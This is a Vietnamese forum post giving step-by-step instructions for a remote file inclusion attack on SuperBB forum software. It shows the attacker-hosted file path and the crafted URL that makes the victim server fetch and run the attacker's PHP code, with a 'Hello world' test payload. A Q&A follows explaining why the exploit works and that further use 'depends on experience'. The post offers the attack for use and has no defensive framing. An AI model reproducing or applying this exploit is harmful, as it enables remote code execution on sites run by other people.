Tài liệu Khai thác lỗi bảo mật forum SuperBB

Thảo luận trong 'Căn Bản' bắt đầu bởi Thúy Viết Bài, 5/12/13.

  1. Thúy Viết Bài

    Thành viên vàng

    Bài viết:
    198,891
    Được thích:
    173
    Điểm thành tích:
    0
    Xu:
    0Xu
    Khai thác lỗi bảo mật forum SuperBB :
    Tạo trên host
    http://[attacker]/lang/1/1_options.php
    Chạy trên trình duyệt
    http://[target]/include/options_form.php?script_path=http://[attacker]&lang_cod
    e=1
    Cách test:
    1. Đăng ký một host ko support PHP.
    2. Tạo trên host đó một folder named lang, trong folder lang tạo folder named 1,
    trong folder 1 tạo một file tên là 1_options.php với nội dung như sau:
    CODE

    <? echo Hello world; ?>

    Chạy trên trình duyệt
    http://[target]/include/options_form.php?script_path=http://[attacker]&lang_cod
    e=1

    Nếu thấy có dòng chữ Hello world thì OK, site đang test bị lỗi này

    Câu hỏi:
    1. SupperBB vuln là gì?

    2. Làm sao đăng kí host trên server đó được ( nếu họ ko cho )

    3. Host ko support php thì làm sao hiển thị cái file 1_options.php được?

    4. Tại sao lại phải tạo folder lang rồi tạo folder name 1 rồi tạo file 1_options.php
    , mục đích là để làm gì?

    5. Site đang test bị lỗi này thì mình làm được gì với lỗi đó?

    Trả lời :
    1. Là lỗi bảo mật của forum SuperBB

    2. Không cần đăng ký host trên server đó, đăng ký host ở đâu cũng được
    (nhưng ko được support PHP)

    3. Được, vì cái file 1_options.php ko phải được run trên host của mình mà được
    inject vào code trên host của victim

    4. Bởi vì script forum nó include đến file 1_options.php ở trong cấu trúc thư mục
    như thế

    5. Làm được gì là tuỳ vào kinh nghiệm mỗi người
     

    Các file đính kèm:

Đang tải...